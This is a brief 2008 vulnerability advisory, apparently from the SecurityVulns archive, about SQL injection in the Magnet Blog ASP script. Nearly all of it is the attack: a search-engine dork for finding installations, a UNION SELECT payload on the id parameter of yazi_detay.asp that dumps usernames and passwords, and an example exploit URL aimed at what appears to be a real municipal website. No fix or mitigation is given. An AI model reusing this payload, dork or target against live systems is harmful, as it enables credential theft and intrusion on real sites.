Magnet Blog Sql Injection Vulnerability

2008-08-08T00:00:00
ID SECURITYVULNS:DOC:20315
Type securityvulns
Reporter Securityvulns
Modified 2008-08-08T00:00:00

Description

Title:Magnet Blog Sql Injection Vulnerability

Discovered by : Alemin_Krali

Dork: "intitle:Magnet Blog"

Download:www.aspindir.com/Goster/4217

Exploit:Http://www.site.com/scriptpath/yazi_detay.asp?id=-999 union select

0,user,2,pass,4,5 from user

Example:

http://www.degirmenayvali.bel.tr/www.bel.trx/magnet_blog/www/yazi_detay.asp?id=1%20union

%20select%200,user,2,pass,4,5%20from%20user

alemin@windowslive.com

a bugs life!


Gelen kutunuzda hiç yer kalmamasından bıktınız mı? Windows Live Hotmail şimdi size 5GB ÜCRETSİZ depolama alanı sunuyor! Ücretsiz Windows Live Hotmail hesabınızı buradan alın! http://get.live.com/mail/overview